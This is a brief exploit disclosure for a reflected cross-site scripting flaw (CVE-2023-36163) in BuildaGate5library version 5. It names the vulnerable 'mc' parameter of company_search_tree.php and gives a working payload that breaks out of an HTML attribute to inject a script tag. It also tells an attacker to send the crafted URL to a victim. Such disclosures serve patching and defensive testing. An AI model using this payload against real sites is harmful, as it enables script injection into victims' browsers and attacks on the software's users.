Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)

Date: 06/07/2023

Exploit Author: Idan Malihi

Vendor Homepage: None

Version: 5

Tested on: Microsoft Windows 10 Pro

CVE: CVE-2023-36163

PoC:

An attacker needs to find the vulnerable parameter (mc=) and inject the JS code like: '><script>prompt("XSS");</script><div id="aa

After that, the attacker must send the full URL with the JS code to the victim and inject their browser.

#Payload: company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa